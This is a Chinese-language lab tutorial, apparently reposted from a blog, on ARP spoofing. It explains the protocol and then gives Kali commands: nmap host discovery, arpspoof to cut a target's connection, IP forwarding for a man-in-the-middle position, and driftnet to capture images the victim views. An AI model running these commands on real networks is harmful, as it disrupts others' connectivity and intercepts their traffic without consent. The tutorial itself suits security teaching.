ARP断网攻击与监听
ARP斷網攻擊與監聽
ARP欺騙
1、ARP協議:地址解析協議
根據IP地址獲取物理地址的一個TCP/IP協議。主機發送信息時將包含目標IP地址的ARP請求廣播到局域網絡上的所有主機,并接收返回消息,以此確定目標的物理地址;收到返回消息后將該IP地址和物理地址存入本機ARP緩存中并保留一定時間,下次請求時直接查詢ARP緩存以節約資源。
2、ARP欺騙
地址解析協議是建立在網絡中各個主機互相信任的基礎上的,局域網絡上的主機可以自主發送ARP應答消息,其他主機收到應答報文時不會檢測該報文的真實性就會將其記入本機ARP緩存;由此攻擊者就可以向某一主機發送偽ARP應答報文,使其發送的信息無法到達預期的主機或到達錯誤的主機,這就構成了一個ARP欺騙
由于ARP緩存表不是實時更新的,如果在網絡中產生大量的ARP通信量,攻擊者只要持續不斷的發出偽造的ARP響應包就能更改目標主機ARP緩存中的IP-MAC條目,造成網絡中斷或中間人攻擊
ARP斷網攻擊
1、查看攻擊機的IP地址(192.168.63.131)、網關(192.168.63.2)等信息
ifconfig
route -n
2、使用Nmap掃描局域網中存活的主機的信息
nmap -sP 192.168.63.0/24
3、攻擊未開始前,目標主機訪問網站正常
4、在kali終端執行arpspoof命令,開始ARP斷網攻擊
arpspoof -i eth0 -t 192.168.63.128(目標IP) 192.168.63.2(網關IP)
5、此時目標主機已經無法正常連接互聯網,訪問百度后如下
6、在kali終端終端欺騙,目標主機可恢復正常訪問互聯網
ARP中間人攻擊(圖片竊取)
端口轉發
1、IP端口轉發
echo 1 > /proc/sys/net/ipv4/ip_forward
輸出1說明成功開啟IP轉發
cat /proc/sys/net/ipv4/ip_foward
2、重新執行arpspoof命令,此時目標主機能正常聯網,端口轉發成功
圖片獲取
1、開啟arp欺騙
2、另開啟一個終端執行driftnet命令,該命令會自動獲取目標主機瀏覽的圖片并保存到kali虛擬機的/home/ices/arptest路徑下
driftnet -i eth0 -a -d /home/ices/arptest
總結
以上是生活随笔為你收集整理的ARP断网攻击与监听的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 2022-2028全球与中国汽车空调冷凝
- 下一篇: 简述维特比算法(Viterbi Algo